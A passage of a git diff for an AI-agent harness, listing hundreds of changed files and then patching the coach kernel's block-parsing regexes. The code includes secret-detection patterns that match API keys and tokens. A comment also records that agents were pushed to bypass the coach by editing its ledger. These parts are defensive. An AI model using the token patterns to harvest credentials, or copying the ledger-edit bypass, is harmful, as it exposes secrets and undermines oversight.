  395. package/hooks/lib/goal-contract-quality.mjs +302 -0
  396. package/hooks/lib/hook-message-window.mjs +101 -9
  397. package/hooks/lib/invocation-required-verifier.mjs +184 -0
  398. package/hooks/lib/kernel/deterministic-cognitive-kernel.mjs +906 -0
  399. package/hooks/lib/obligation-ledger.mjs +147 -0
  400. package/hooks/lib/orchestration-manifest-extract.mjs +217 -0
  401. package/hooks/lib/owner-authorizations.mjs +269 -0
  402. package/hooks/lib/probe-discipline-scanner.mjs +142 -0
  403. package/hooks/lib/project-boundary-cognition.mjs +143 -0
  404. package/hooks/lib/recovery-context.mjs +151 -0
  405. package/hooks/lib/recovery-template-loader.mjs +154 -0
  406. package/hooks/lib/self-doctrine-check.mjs +321 -0
  407. package/hooks/lib/sensitive-shape-detector.mjs +64 -0
  408. package/hooks/lib/skill-autoload-gate-impl.mjs +226 -1
  409. package/hooks/lib/stop-hook-protocol.mjs +166 -0
  410. package/hooks/lib/surface-caught.mjs +94 -0
  411. package/hooks/recovery-templates/force-reauthor.md +67 -0
  412. package/hooks/recovery-templates/handoff-recovery.md +25 -0
  413. package/hooks/scripts/check-hard-risk-prefix.mjs +99 -0
  414. package/hooks/skills/aria-conversational-doctrine-discipline/SKILL.md +101 -0
  415. package/hooks/test-aria-preturn-memory-gate.mjs +2 -2
  416. package/hooks/test-tier-lens-labeling.mjs +14 -3
  417. package/opencode-plugins/harness-context/index.js +39 -6
  418. package/opencode-plugins/harness-context/task-project-ledger.mjs +5 -1
  419. package/opencode-plugins/harness-gate/index.js +36 -0
  420. package/opencode-plugins/harness-gate/lib/atlas-dossier-client.js +1 -0
  421. package/opencode-plugins/harness-gate/lib/recovery-grants.js +79 -0
  422. package/opencode-plugins/harness-outcome/index.js +12 -0
  423. package/opencode-plugins/harness-stop/index.js +97 -2
  424. package/opencode-plugins/harness-stop/lib/atlas-dossier-client.js +1 -0
  425. package/opencode-plugins/harness-stop/lib/domain-output-quality.js +15 -2
  426. package/opencode-plugins/lib/coach.js +148 -0
  427. package/package.json +71 -5
  428. package/runtime-src/coach-kernel.mjs +144 -7
  429. package/runtime-src/codex-bridge.mjs +254 -8
  430. package/runtime-src/embedded-public-key.mjs +27 -0
  431. package/runtime-src/gated-ledger.mjs +41 -14
  432. package/runtime-src/harness-daemon.mjs +85 -10
  433. package/runtime-src/hive-wal-publisher.mjs +292 -0
  434. package/runtime-src/lib/evaluate-with-kernel.mjs +133 -0
  435. package/runtime-src/lib/kernel/deterministic-cognitive-kernel.mjs +906 -0
  436. package/runtime-src/local-phase.mjs +10 -5
  437. package/runtime-src/packet-verifier.mjs +166 -0
  438. package/runtime-src/provider-proxy.mjs +13 -0
  439. package/runtime-src/quality-enforcer.mjs +40 -23
  440. package/runtime-src/runtime-rails/registry.mjs +252 -0
  441. package/runtime-src/service.mjs +8036 -764
  442. package/runtime-src/sub-agent-enforcer.mjs +201 -0
  443. package/scripts/aria-ledger-append.mjs +337 -0
  444. package/scripts/aria-task-cheap-worker-dispatch.mjs +234 -0
  445. package/scripts/audit-of-audit-prior-tasks.mjs +194 -0
  446. package/scripts/audit-of-audit-this-turn.mjs +116 -0
  447. package/scripts/bundle-sdk.mjs +31 -5
  448. package/scripts/check-cli-wrapper-provider-contract.mjs +160 -0
  449. package/scripts/check-client-compatibility.mjs +15 -5
  450. package/scripts/check-client-smoke.mjs +297 -0
  451. package/scripts/check-codex-orchestrator-adoption.mjs +150 -0
  452. package/scripts/check-glm-env-wired.mjs +131 -0
  453. package/scripts/check-hive-local-storage-contract.mjs +91 -0
  454. package/scripts/check-hook-mirror.mjs +150 -0
  455. package/scripts/check-install-sh-drift.mjs +152 -0
  456. package/scripts/check-kernel-sync.mjs +101 -0
  457. package/scripts/check-package-artifact.mjs +152 -0
  458. package/scripts/check-registry-mirror.mjs +71 -0
  459. package/scripts/drain-owner-airtable-sync-queue.mjs +287 -0
  460. package/scripts/export-owner-status-sheets.mjs +589 -0
  461. package/scripts/live-sidecar-receipt-canary.mjs +347 -0
  462. package/scripts/qiyas-tadabbur-model-matrix.mjs +970 -0
  463. package/scripts/quality-ab-live-provider.mjs +913 -0
  464. package/scripts/self-test-action-ledger-core.mjs +190 -0
  465. package/scripts/self-test-approval-receipt-binding.mjs +122 -0
  466. package/scripts/self-test-autofire-quality-output.mjs +110 -0
  467. package/scripts/self-test-claude-code-action-ledger.mjs +132 -0
  468. package/scripts/self-test-claude-code-mechanical-autofire-hive.mjs +138 -0
  469. package/scripts/self-test-claude-code-mechanical-autofire.mjs +234 -0
  470. package/scripts/self-test-codebase-awareness-atlas-delta.mjs +159 -0
  471. package/scripts/self-test-codebase-awareness-delta-ingest.mjs +179 -0
  472. package/scripts/self-test-codex-live-hook-parity.mjs +84 -0
  473. package/scripts/self-test-codex-native-action-ledger.mjs +167 -0
  474. package/scripts/self-test-codex-native-hook-json-contract.mjs +74 -0
  475. package/scripts/self-test-codex-orchestrator-continuity.mjs +113 -0
  476. package/scripts/self-test-codex-readable-recovery.mjs +94 -0
  477. package/scripts/self-test-codex-self-harness.mjs +538 -0
  478. package/scripts/self-test-compiled-workunit.mjs +214 -0
  479. package/scripts/self-test-continuation-output-smoke.mjs +101 -0
  480. package/scripts/self-test-cross-cli-fleet-ticker.mjs +85 -0
  481. package/scripts/self-test-cross-cli-hive-adoption.mjs +125 -0
  482. package/scripts/self-test-cross-cli-hive-learning.mjs +146 -0
  483. package/scripts/self-test-cross-phase-tool-failure.mjs +110 -0
  484. package/scripts/self-test-cross-surface-action-ledger.mjs +149 -0
  485. package/scripts/self-test-end-of-phase-qa-court.mjs +616 -0
  486. package/scripts/self-test-evaluate-with-kernel.mjs +111 -0
  487. package/scripts/self-test-first-class-output-delta-proof.mjs +307 -0
  488. package/scripts/self-test-goal-contract-output-qa.mjs +73 -0
  489. package/scripts/self-test-goal-contract.mjs +35 -0
  490. package/scripts/self-test-governed-adapters.mjs +105 -0
  491. package/scripts/self-test-governed-surface-runner.mjs +198 -0
  492. package/scripts/self-test-harness-gates.mjs +15 -12
  493. package/scripts/self-test-harness-ticker-sidecar.mjs +153 -0
  494. package/scripts/self-test-hive-org-kernel.mjs +233 -0
  495. package/scripts/self-test-hive-session-coordination.mjs +156 -0
  496. package/scripts/self-test-hive-wal-consumer.mjs +111 -0
  497. package/scripts/self-test-kernel-a3-a4-selection.mjs +179 -0
  498. package/scripts/self-test-ledger-append.mjs +175 -0
  499. package/scripts/self-test-live-codex-posttool-packet-smoke.mjs +111 -0
  500. package/scripts/self-test-live-codex-pretool-packet-smoke.mjs +101 -0
  501. package/scripts/self-test-live-codex-stop-qa-kernel-smoke.mjs +43 -0
  502. package/scripts/self-test-live-wrapper-substrate-inventory.mjs +149 -0
  503. package/scripts/self-test-local-main-sync-script.mjs +47 -0
  504. package/scripts/self-test-mechanical-autofire-resolver.mjs +296 -0
  505. package/scripts/self-test-no-consult-cognitive-skills-output.mjs +135 -0
  506. package/scripts/self-test-owner-airtable-sync-queue.mjs +196 -0
  507. package/scripts/self-test-owner-airtable-sync.mjs +181 -0
  508. package/scripts/self-test-owner-sheets-action-ledger.mjs +100 -0
  509. package/scripts/self-test-production-preflight.mjs +78 -0
  510. package/scripts/self-test-project-boundary-cognition.mjs +79 -0
  511. package/scripts/self-test-qa-exec-kernel.mjs +34 -0
  512. package/scripts/self-test-qa-recovery-learning-loop.mjs +113 -0
  513. package/scripts/self-test-qiyas-label-alignment.mjs +94 -0
  514. package/scripts/self-test-recovery-context.mjs +110 -0
  515. package/scripts/self-test-repo-guard.mjs +10 -0
  516. package/scripts/self-test-runtime-health-self-heal.mjs +161 -0
  517. package/scripts/self-test-runtime-postcondition.mjs +70 -0
  518. package/scripts/self-test-soul-precommit-hook.mjs +39 -0
  519. package/scripts/self-test-stop-gate-kernel-guards.mjs +185 -0
  520. package/scripts/self-test-stop-gate.mjs +128 -0
  521. package/scripts/self-test-substrate-kernel-execution-receipt.mjs +130 -0
  522. package/scripts/self-test-substrate-open-skill-floor.mjs +87 -0
  523. package/scripts/self-test-substrate-output-quality-eval.mjs +171 -0
  524. package/scripts/self-test-task-closeout-drift.mjs +97 -0
  525. package/scripts/self-test-task-project-ledger-readiness.mjs +43 -0
  526. package/scripts/self-test-task-runner-phase-consumer.mjs +134 -0
  527. package/scripts/self-test-task-worker-lane.mjs +256 -0
  528. package/scripts/self-test-turn-substrate-qa-kernel.mjs +188 -0
  529. package/scripts/self-test-universal-action-capture.mjs +153 -0
  530. package/scripts/self-test-universal-turn-packet-entrypoints.mjs +252 -0
  531. package/scripts/self-test-universal-turn-packet.mjs +320 -0
  532. package/scripts/session-quality-backfill.mjs +253 -0
  533. package/scripts/smoke-autofire-100-prompts.mjs +481 -0
  534. package/scripts/sync-local-main-on-task-complete.mjs +278 -0
  535. package/scripts/sync-owner-status-airtable.mjs +1158 -0
  536. package/scripts/validate-skill-prompts.mjs +12 -1
  537. package/scripts/verify-codex-native-mirror.mjs +262 -0
  538. package/skills/34-frameworks-unified/SKILL.md +42 -0
  539. package/skills/api-design/SKILL.md +123 -0
  540. package/skills/architecture-decision/SKILL.md +105 -0
  541. package/skills/aria-aristotle-cognitives/SKILL.md +128 -0
  542. package/skills/aria-aristotle-intra-phase/SKILL.md +99 -0
  543. package/skills/aria-aristotle-post-phase/SKILL.md +116 -0
  544. package/skills/aria-aristotle-pre-phase/SKILL.md +117 -0
  545. package/skills/aria-axioms-first-principles/SKILL.md +202 -0
  546. package/skills/aria-axioms-first-principles/agents/openai.yaml +4 -0
  547. package/skills/aria-axioms-first-principles/references/source-map.md +130 -0
  548. package/skills/aria-chat/SKILL.md +84 -0
  549. package/skills/aria-chat/scripts/aria-chat.sh +57 -0
  550. package/skills/aria-cognition/34-frameworks-unified/SKILL.md +42 -0
  551. package/skills/aria-cognition/aria-aristotle-cognitives/SKILL.md +128 -0
  552. package/skills/aria-cognition/aria-aristotle-intra-phase/SKILL.md +99 -0
  553. package/skills/aria-cognition/aria-aristotle-post-phase/SKILL.md +118 -0
  554. package/skills/aria-cognition/aria-aristotle-pre-phase/SKILL.md +117 -0
  555. package/skills/aria-cognition/aria-axioms-first-principles/SKILL.md +202 -0
  556. package/skills/aria-cognition/aria-axioms-first-principles/agents/openai.yaml +4 -0
  557. package/skills/aria-cognition/aria-axioms-first-principles/references/source-map.md +130 -0
  558. package/skills/aria-cognition/aria-backend-architect/SKILL.md +124 -0
  559. package/skills/aria-cognition/aria-backend-architect/references/backend-cookbook.md +417 -0
  560. package/skills/aria-cognition/aria-business-audit/SKILL.md +133 -0
  561. package/skills/aria-cognition/aria-business-audit/references/audit-cookbook.md +247 -0
  562. package/skills/aria-cognition/aria-business-frame/SKILL.md +138 -0
  563. package/skills/aria-cognition/aria-business-frame/references/business-cookbook.md +154 -0
  564. package/skills/aria-cognition/aria-chat/SKILL.md +84 -0
  565. package/skills/aria-cognition/aria-chat/scripts/aria-chat.sh +57 -0
  566. package/skills/aria-cognition/aria-cognition-autofire/SKILL.md +137 -0
  567. package/skills/aria-cognition/aria-cognition-batch/SKILL.md +264 -0
  568. package/skills/aria-cognition/aria-decision-mizan/SKILL.md +136 -0
  569. package/skills/aria-cognition/aria-decision-mizan/references/decision-frameworks.md +287 -0
  570. package/skills/aria-cognition/aria-first-class-operating-contract/SKILL.md +104 -0
  571. package/skills/aria-cognition/aria-frontend-architect/SKILL.md +123 -0
  572. package/skills/aria-cognition/aria-frontend-architect/references/frontend-cookbook.md +358 -0
  573. package/skills/aria-cognition/aria-fullstack-orchestrator/SKILL.md +127 -0
  574. package/skills/aria-cognition/aria-fullstack-orchestrator/references/fullstack-cookbook.md +383 -0
  575. package/skills/aria-cognition/aria-gtm-architect/SKILL.md +126 -0
  576. package/skills/aria-cognition/aria-gtm-architect/references/gtm-cookbook.md +235 -0
  577. package/skills/aria-cognition/aria-harness-deploy/SKILL.md +145 -0
  578. package/skills/aria-cognition/aria-harness-no-stripping/SKILL.md +135 -0
  579. package/skills/aria-cognition/aria-harness-onboarding/SKILL.md +130 -0
  580. package/skills/aria-cognition/aria-harness-output-discipline/SKILL.md +120 -0
  581. package/skills/aria-cognition/aria-harness-substrate-binding/SKILL.md +139 -0
  582. package/skills/aria-cognition/aria-http-harness-client/SKILL.md +85 -0
  583. package/skills/aria-cognition/aria-http-harness-client/scripts/smoke.mjs +47 -0
  584. package/skills/aria-cognition/aria-k8s-deploy/SKILL.md +174 -0
  585. package/skills/aria-cognition/aria-k8s-deploy/agents/openai.yaml +3 -0
  586. package/skills/aria-cognition/aria-ladduniframe/SKILL.md +60 -0
  587. package/skills/aria-cognition/aria-ledger-fleet-execution/SKILL.md +126 -0
  588. package/skills/aria-cognition/aria-live-ops/SKILL.md +54 -0
  589. package/skills/aria-cognition/aria-mac-ssh-ops/SKILL.md +100 -0
  590. package/skills/aria-cognition/aria-memory-index/SKILL.md +42 -0
  591. package/skills/aria-cognition/aria-noor-cognitives/SKILL.md +120 -0
  592. package/skills/aria-cognition/aria-ops/SKILL.md +60 -0
  593. package/skills/aria-cognition/aria-ops/references/live-endpoints.md +59 -0
  594. package/skills/aria-cognition/aria-quality-audit/SKILL.md +133 -0
  595. package/skills/aria-cognition/aria-readable-output/SKILL.md +239 -0
  596. package/skills/aria-cognition/aria-readable-output/references/layout-cookbook.md +366 -0
  597. package/skills/aria-cognition/aria-reasoning/SKILL.md +67 -0
  598. package/skills/aria-cognition/aria-reasoning/references/core-principles.md +42 -0
  599. package/skills/aria-cognition/aria-repo-audit/SKILL.md +135 -0
  600. package/skills/aria-cognition/aria-repo-audit/references/repo-audit-cookbook.md +375 -0
  601. package/skills/aria-cognition/aria-research-orchestrator/SKILL.md +138 -0
  602. package/skills/aria-cognition/aria-research-orchestrator/references/research-patterns.md +270 -0
  603. package/skills/aria-cognition/aria-retention-engine/SKILL.md +120 -0
  604. package/skills/aria-cognition/aria-retention-engine/references/retention-cookbook.md +271 -0
  605. package/skills/aria-cognition/aria-revenue-engine/SKILL.md +128 -0
  606. package/skills/aria-cognition/aria-revenue-engine/references/revenue-cookbook.md +227 -0
  607. package/skills/aria-cognition/aria-senior-code-audit/SKILL.md +233 -0
  608. package/skills/aria-cognition/aria-senior-code-audit/references/audit-checklist.md +369 -0
  609. package/skills/aria-cognition/aria-senior-code-cookbook/SKILL.md +288 -0
  610. package/skills/aria-cognition/aria-senior-code-cookbook/references/engineering-cookbook.md +489 -0
  611. package/skills/aria-cognition/aria-soul-principles/SKILL.md +42 -0
  612. package/skills/aria-cognition/aria-task-codex-executor/SKILL.md +86 -0
  613. package/skills/aria-cognition/aristotle-engine/SKILL.md +42 -0
  614. package/skills/aria-cognition/cross-domain-24/SKILL.md +42 -0
  615. package/skills/aria-cognition/deepsoul-emotional/SKILL.md +42 -0
  616. package/skills/aria-cognition/fitrah-guard/SKILL.md +78 -0
  617. package/skills/aria-cognition/ghazali-8lens/SKILL.md +227 -29
  618. package/skills/aria-cognition/ghazali-8lens/references/ghazali-8lens-cookbook.md +797 -0
  619. package/skills/aria-cognition/ijtihad-novel/SKILL.md +42 -0
  620. package/skills/aria-cognition/ilham-intuition/SKILL.md +42 -0
  621. package/skills/aria-cognition/never-guess/SKILL.md +77 -0
  622. package/skills/aria-cognition/noor-recognition/SKILL.md +45 -0
  623. package/skills/aria-cognition/qiyas-analogy/SKILL.md +174 -14
  624. package/skills/aria-cognition/ruh-basis/SKILL.md +42 -0
  625. package/skills/aria-cognition/tadabbur/SKILL.md +506 -0
  626. package/skills/aria-cognition/tadabbur/references/tadabbur-cookbook.md +921 -0
  627. package/skills/aria-cognition/tadabbur-ops/SKILL.md +42 -0
  628. package/skills/aria-cognition/tafakkur/SKILL.md +104 -0
  629. package/skills/aria-cognition-autofire/SKILL.md +109 -0
  630. package/skills/aria-cognition-batch/SKILL.md +264 -0
  631. package/skills/aria-conversational-doctrine-discipline/SKILL.md +125 -0
  632. package/skills/aria-essence/SKILL.md +81 -0
  633. package/skills/aria-essence/references/domain-matrix.md +80 -0
  634. package/skills/aria-essence/references/evolution-loop.md +30 -0
  635. package/skills/aria-essence/references/readable-cognition.md +27 -0
  636. package/skills/aria-first-class-operating-contract/SKILL.md +104 -0
  637. package/skills/aria-forge-guardrails/SKILL.md +53 -0
  638. package/skills/aria-forge-guardrails/references/checklist.md +31 -0
  639. package/skills/aria-harness-deploy/SKILL.md +145 -0
  640. package/skills/aria-harness-no-stripping/SKILL.md +135 -0
  641. package/skills/aria-harness-onboarding/SKILL.md +130 -0
  642. package/skills/aria-harness-output-discipline/SKILL.md +120 -0
  643. package/skills/aria-harness-substrate-binding/SKILL.md +139 -0
  644. package/skills/aria-http-harness-client/SKILL.md +85 -0
  645. package/skills/aria-http-harness-client/scripts/smoke.mjs +47 -0
  646. package/skills/aria-k8s-deploy/SKILL.md +174 -0
  647. package/skills/aria-k8s-deploy/agents/openai.yaml +3 -0
  648. package/skills/aria-ladduniframe/SKILL.md +60 -0
  649. package/skills/aria-ledger-fleet-execution/SKILL.md +126 -0
  650. package/skills/aria-live-ops/SKILL.md +54 -0
  651. package/skills/aria-mac-ssh-ops/SKILL.md +100 -0
  652. package/skills/aria-memory-index/SKILL.md +42 -0
  653. package/skills/aria-noor-cognitives/SKILL.md +120 -0
  654. package/skills/aria-ops/SKILL.md +60 -0
  655. package/skills/aria-ops/references/live-endpoints.md +59 -0
  656. package/skills/aria-quality-audit/SKILL.md +133 -0
  657. package/skills/aria-reasoning/SKILL.md +67 -0
  658. package/skills/aria-reasoning/references/core-principles.md +42 -0
  659. package/skills/aria-repo-doctrine/SKILL.md +57 -0
  660. package/skills/aria-soul-principles/SKILL.md +42 -0
  661. package/skills/aria-task-codex-executor/SKILL.md +86 -0
  662. package/skills/aristotle-engine/SKILL.md +42 -0
  663. package/skills/ci-cd-pipeline/SKILL.md +116 -0
  664. package/skills/code-review/SKILL.md +131 -0
  665. package/skills/cross-domain-24/SKILL.md +42 -0
  666. package/skills/database-design/SKILL.md +124 -0
  667. package/skills/deepsoul-emotional/SKILL.md +42 -0
  668. package/skills/deno-kv-raft-pubsub/SKILL.md +561 -0
  669. package/skills/deno-kv-raft-pubsub/reference/maelstrom-integration.md +393 -0
  670. package/skills/deno-kv-raft-pubsub/reference/pubsub-api.md +376 -0
  671. package/skills/deno-kv-raft-pubsub/reference/raft-spec.md +402 -0
  672. package/skills/deno-kv-raft-pubsub/reference/state-machine.md +182 -0
  673. package/skills/error-handling/SKILL.md +159 -0
  674. package/skills/firecrawl/SKILL.md +165 -0
  675. package/skills/firecrawl/rules/install.md +82 -0
  676. package/skills/firecrawl/rules/security.md +26 -0
  677. package/skills/firecrawl-agent/SKILL.md +86 -0
  678. package/skills/firecrawl-build-interact/SKILL.md +96 -0
  679. package/skills/firecrawl-build-onboarding/SKILL.md +131 -0
  680. package/skills/firecrawl-build-onboarding/references/auth-flow.md +39 -0
  681. package/skills/firecrawl-build-onboarding/references/project-setup.md +20 -0
  682. package/skills/firecrawl-build-onboarding/references/sdk-installation.md +17 -0
  683. package/skills/firecrawl-build-scrape/SKILL.md +97 -0
  684. package/skills/firecrawl-build-search/SKILL.md +97 -0
  685. package/skills/firecrawl-clone/SKILL.md +419 -0
  686. package/skills/firecrawl-crawl/SKILL.md +87 -0
  687. package/skills/firecrawl-download/SKILL.md +98 -0
  688. package/skills/firecrawl-interact/SKILL.md +112 -0
  689. package/skills/firecrawl-map/SKILL.md +79 -0
  690. package/skills/firecrawl-scrape/SKILL.md +97 -0
  691. package/skills/firecrawl-search/SKILL.md +88 -0
  692. package/skills/fitrah-guard/SKILL.md +78 -0
  693. package/skills/forge-quality-rules/SKILL.md +61 -0
  694. package/skills/ghazali-8lens/SKILL.md +56 -0
  695. package/skills/ijtihad-novel/SKILL.md +42 -0
  696. package/skills/ilham-intuition/SKILL.md +42 -0
  697. package/skills/imagegen/LICENSE.txt +201 -0
  698. package/skills/imagegen/SKILL.md +374 -0
  699. package/skills/imagegen/agents/openai.yaml +6 -0
  700. package/skills/imagegen/assets/imagegen-small.svg +5 -0
  701. package/skills/imagegen/assets/imagegen.png +0 -0
  702. package/skills/imagegen/references/cli.md +242 -0
  703. package/skills/imagegen/references/codex-network.md +33 -0
  704. package/skills/imagegen/references/image-api.md +90 -0
  705. package/skills/imagegen/references/prompting.md +118 -0
  706. package/skills/imagegen/references/sample-prompts.md +433 -0
  707. package/skills/imagegen/scripts/image_gen.py +995 -0
  708. package/skills/imagegen/scripts/remove_chroma_key.py +440 -0
  709. package/skills/istiqra-induction/SKILL.md +44 -0
  710. package/skills/ladunni-22/SKILL.md +53 -0
  711. package/skills/mizan/SKILL.md +90 -0
  712. package/skills/nadia/SKILL.md +56 -0
  713. package/skills/nadia-psi/SKILL.md +56 -0
  714. package/skills/never-guess/SKILL.md +75 -0
  715. package/skills/noor-recognition/SKILL.md +45 -0
  716. package/skills/observability/SKILL.md +133 -0
  717. package/skills/openai-docs/LICENSE.txt +201 -0
  718. package/skills/openai-docs/SKILL.md +100 -0
  719. package/skills/openai-docs/agents/openai.yaml +14 -0
  720. package/skills/openai-docs/assets/openai-small.svg +3 -0
  721. package/skills/openai-docs/assets/openai.png +0 -0
  722. package/skills/openai-docs/references/latest-model.md +37 -0
  723. package/skills/openai-docs/references/prompting-guide.md +244 -0
  724. package/skills/openai-docs/references/upgrade-guide.md +181 -0
  725. package/skills/openai-docs/scripts/resolve-latest-model-info.js +147 -0
  726. package/skills/pdf/LICENSE.txt +201 -0
  727. package/skills/pdf/SKILL.md +85 -0
  728. package/skills/pdf/agents/openai.yaml +5 -0
  729. package/skills/pdf/assets/pdf.png +0 -0
  730. package/skills/playwright/LICENSE.txt +201 -0
  731. package/skills/playwright/NOTICE.txt +14 -0
  732. package/skills/playwright/SKILL.md +165 -0
  733. package/skills/playwright/agents/openai.yaml +6 -0
  734. package/skills/playwright/assets/playwright-small.svg +3 -0
  735. package/skills/playwright/assets/playwright.png +0 -0
  736. package/skills/playwright/references/cli.md +116 -0
  737. package/skills/playwright/references/workflows.md +95 -0
  738. package/skills/playwright/scripts/playwright_cli.sh +25 -0
  739. package/skills/plugin-creator/SKILL.md +178 -0
  740. package/skills/plugin-creator/agents/openai.yaml +6 -0
  741. package/skills/plugin-creator/assets/plugin-creator-small.svg +3 -0
  742. package/skills/plugin-creator/assets/plugin-creator.png +0 -0
  743. package/skills/plugin-creator/references/plugin-json-spec.md +170 -0
  744. package/skills/plugin-creator/scripts/create_basic_plugin.py +301 -0
  745. package/skills/predictor/SKILL.md +43 -0
  746. package/skills/qiyas-analogy/SKILL.md +204 -0
  747. package/skills/refactoring/SKILL.md +137 -0
  748. package/skills/ruh-basis/SKILL.md +42 -0
  749. package/skills/security-review/SKILL.md +129 -0
  750. package/skills/skill-creator/SKILL.md +434 -0
  751. package/skills/skill-creator/agents/openai.yaml +5 -0
  752. package/skills/skill-creator/assets/skill-creator-small.svg +3 -0
  753. package/skills/skill-creator/assets/skill-creator.png +0 -0
  754. package/skills/skill-creator/license.txt +202 -0
  755. package/skills/skill-creator/references/openai_yaml.md +49 -0
  756. package/skills/skill-creator/scripts/generate_openai_yaml.py +226 -0
  757. package/skills/skill-creator/scripts/init_skill.py +400 -0
  758. package/skills/skill-creator/scripts/quick_validate.py +101 -0
  759. package/skills/skill-installer/LICENSE.txt +202 -0
  760. package/skills/skill-installer/SKILL.md +76 -0
  761. package/skills/skill-installer/agents/openai.yaml +5 -0
  762. package/skills/skill-installer/assets/skill-installer-small.svg +3 -0
  763. package/skills/skill-installer/assets/skill-installer.png +0 -0
  764. package/skills/skill-installer/scripts/github_utils.py +21 -0
  765. package/skills/skill-installer/scripts/install-skill-from-github.py +308 -0
  766. package/skills/skill-installer/scripts/list-skills.py +107 -0
  767. package/skills/skills-and-hooks-reference/SKILL.md +196 -0
  768. package/skills/soul-domains/SKILL.md +43 -0
  769. package/skills/tadabbur/SKILL.md +232 -0
  770. package/skills/tadabbur-ops/SKILL.md +42 -0
  771. package/skills/tafakkur/SKILL.md +104 -0
  772. package/skills/testing-strategy/SKILL.md +122 -0
  773. package/src/action-ledger-core.ts +1054 -0
  774. package/src/chat.ts +5 -6
  775. package/src/codebase-scanner.ts +2 -0
  776. package/src/connectors/claude-code.ts +149 -12
  777. package/src/connectors/codebase-awareness.ts +325 -25
  778. package/src/connectors/codex.ts +1273 -40
  779. package/src/connectors/cursor.ts +8 -0
  780. package/src/connectors/governed-adapter.ts +174 -0
  781. package/src/connectors/opencode.ts +18 -2
  782. package/src/connectors/repo-guard.ts +24 -12
  783. package/src/connectors/runtime.ts +99 -2
  784. package/src/connectors/shell.ts +125 -7
  785. package/src/cross-cli-hive-binding.ts +290 -0
  786. package/src/garden-control-plane.ts +24 -1
  787. package/src/governed-surface-runner.ts +1227 -0
  788. package/src/index.ts +104 -1
  789. package/src/task-runner.ts +3794 -0
  790. package/dist/aria-connector/src/install-hooks.d.ts +0 -18
  791. package/dist/aria-connector/src/install-hooks.d.ts.map +0 -1
  792. package/dist/aria-connector/src/install-hooks.js +0 -224
  793. package/dist/aria-connector/src/install-hooks.js.map +0 -1
  794. package/dist/aria-connector/src/onboarding-wizard.d.ts +0 -5
  795. package/dist/aria-connector/src/onboarding-wizard.d.ts.map +0 -1
  796. package/dist/aria-connector/src/onboarding-wizard.js +0 -188
  797. package/dist/aria-connector/src/onboarding-wizard.js.map +0 -1
  798. package/dist/cli-0.2.38.tgz +0 -0
  799. package/dist/install.sh +0 -13
  800. package/src/__tests__/anthropic-oauth.test.ts +0 -186
  801. package/src/__tests__/auth-commands.test.ts +0 -132
  802. package/src/__tests__/owner-login.test.ts +0 -311
package/dist/runtime/coach-kernel.mjs CHANGED
@@ -32,9 +32,25 @@ const OUTPUT_PHASES = new Set(['post_generation', 'pre_output', 'post_output', '
32
32
  const TOOL_PHASES = new Set(['pre_tool', 'post_tool']);
33
33
  const SECRET_KEY_RX = /\b(?:api[_-]?key|secret|token|authorization|password|credential|private[_-]?key)\b/i;
34
34
  const SECRET_VALUE_RX = /\b(?:sk-[A-Za-z0-9_-]{16,}|xox[baprs]-[A-Za-z0-9-]{20,}|gh[pousr]_[A-Za-z0-9_]{20,}|Bearer\s+[A-Za-z0-9._~+\/-]{20,}|AKIA[0-9A-Z]{16})\b/i;
35
- const COGNITION_RX = /<cognition>[\s\S]*?<\/cognition>/i;
36
- const APPLIED_COGNITION_RX = /<applied_cognition>[\s\S]*?<\/applied_cognition>/i;
37
- const VERIFY_RX = /<verify>[\s\S]*?(?:verified|rollback|target|predicate)[\s\S]*?<\/verify>/i;
35
+ // AI-11803-COACH-PARSER-FIX (2026-05-12) — whitespace-tolerant block patterns.
36
+ // Prior: strict `<cognition>` regex rejected `< cognition>`, `<cognition >`,
37
+ // `<cognition\n>` and any whitespace-shaped opening/closing tag. Consequence:
38
+ // agents emitting valid blocks with trivial whitespace variants hit
39
+ // missing_readable_cognition_before_release / missing_applied_cognition_before_release
40
+ // repeat-fires, which created a coach-loop with no escape and pressured
41
+ // agents toward bypass via ledger edit.
42
+ // Byte-aligned with ops/claude-hooks/lib/cognitive-block-parser.mjs:33-35,
43
+ // the canonical structural extractor.
44
+ //
45
+ // AI-11803-COACH-PARSER-FIX-VERIFY — VERIFY_RX prior pattern required one of
46
+ // the literal keywords {verified, rollback, target, predicate} INSIDE the
47
+ // block. Real-world verify blocks commonly carry the evidence directly
48
+ // (exit 0, status: 200, sha256:..., HTTP 2xx) without those specific
49
+ // keywords. Relax to any non-empty block body; rely on hasEvidence /
50
+ // MEASURABLE_EVIDENCE_RX to verify the substance.
51
+ const COGNITION_RX = /<\s*cognition\s*>[\s\S]*?<\s*\/\s*cognition\s*>/i;
52
+ const APPLIED_COGNITION_RX = /<\s*applied_cognition\s*>[\s\S]*?<\s*\/\s*applied_cognition\s*>/i;
53
+ const VERIFY_RX = /<\s*verify\s*>[\s\S]+?<\s*\/\s*verify\s*>/i;
38
54
  const COMPLETION_CLAIM_RX = /\b(?:done|complete|completed|ready|verified|fixed|shipped|production-ready|release-ready|passing|passed)\b/i;
39
55
  const MEASURABLE_EVIDENCE_RX = /\b(?:exit\s*0|0\s+failures?|passed|status\s*[:=]\s*(?:ok|200|healthy|pass)|verified\s*[:=]\s*true|ledger_record_id|receiptId|sha256|http\s*2\d\d)\b/i;
40
56
 
@@ -106,12 +122,87 @@ function phaseOrDefault(phase) {
106
122
  return ALLOWED_PHASES.has(candidate) ? candidate : 'pre_turn';
107
123
  }
108
124
 
125
+ // AI-11803-COACH-VERIFY-PARITY (2026-05-12) — extend remote evidence detection
126
+ // to read PostToolUse tool_response shapes (parity with the local hook fix in
127
+ // ops/claude-hooks/lib/first-class-coach.mjs:hasVerificationEvidence). Non-
128
+ // local-hook callers (other surfaces posting raw events to /coach/phase) get
129
+ // the same auto-evidence detection from Bash + curl + JSON responses; local
130
+ // hook callers already get it via applyLocalLedgerSupersedes but parity here
131
+ // removes the silent dual-system-must-agree drift surface.
132
+ function readToolResponseTexts(event) {
133
+ const out = [];
134
+ const tr = event?.tool_response || event?.toolResponse || event?.tool_result || event?.toolResult;
135
+ if (tr && typeof tr === 'object') {
136
+ if (typeof tr.stdout === 'string') out.push(tr.stdout);
137
+ if (typeof tr.output === 'string') out.push(tr.output);
138
+ if (typeof tr.text === 'string') out.push(tr.text);
139
+ if (typeof tr.result === 'string') out.push(tr.result);
140
+ if (typeof tr.content === 'string') out.push(tr.content);
141
+ if (Array.isArray(tr.content)) {
142
+ for (const piece of tr.content) {
143
+ if (piece && typeof piece === 'object' && typeof piece.text === 'string') out.push(piece.text);
144
+ }
145
+ }
146
+ }
147
+ return out;
148
+ }
149
+
150
+ function extractFirstJsonObject(text) {
151
+ if (typeof text !== 'string') return null;
152
